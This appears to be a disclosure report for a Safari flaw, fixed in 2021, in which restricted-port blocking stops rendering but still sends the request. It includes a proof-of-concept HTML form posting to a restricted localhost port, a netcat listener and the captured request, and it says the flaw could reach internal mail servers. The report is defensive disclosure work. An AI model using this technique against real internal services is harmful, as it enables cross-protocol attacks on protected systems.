Summary:

Safari restricted port blocking is not enforced properly. When requesting a page on a restricted port, only rendering is blocked, but the initial request gets sent to the restricted port.

Steps to reproduce:

  1. Create an HTML file with this POC:
<form action="http://127.0.0.1:6000" method="POST" enctype="multipart/form-data">
    <label for="data">post data:</label>
    <input type="text" id="data" name="data">
</form>
  1. Listen on port 6000 (a restricted port) with netcat: $ nc -l 127.0.0.1 6000
  2. Open the HTML file created in Step 1. in Safari
  3. Enter any value into the post data: form field, and press enter
  4. See that Safari shows an error with the message:
Safari can't open the page "http://127.0.0.1:6000/". The error is: "Not allowed to use
restricted network port" (WebKitErrorDomain:103)
  1. In the terminal running netcat, see that the request still got sent:
$ nc -l 127.0.0.1 6000
POST / HTTP/1.1
Host: 127.0.0.1:6000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFFmUrfH05DvsT29s
Origin: null
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15
Content-Length: 153
Accept-Language: en-gb
Accept-Encoding: gzip, deflate

------WebKitFormBoundaryFFmUrfH05DvsT29s
Content-Disposition: form-data; name="data"

123_test_post_data
------WebKitFormBoundaryFFmUrfH05DvsT29s--

Impact:

This could be used to bypass the restricted port protection, and send malicious commands to non-HTTP services running on these sensitive ports, like mail servers. This blog post demonstrates the impact, exploiting internal SMTP servers: https://cxsecurity.com/issue/WLB-2010030240

[Disclosure Warning]:

This issue is subject to a 90 day disclosure deadline. On 2021-06-11 this issue will be publicly disclosed. If you would like to redact additional information or if for some reason the issue can’t be fixed until the deadline, let me know.

This issue was fixed in iOS/iPadOS 14.6, macOS Big Sur 11.4, Safari 14.1.1, watchOS 7.5 and in tvOS 14.6.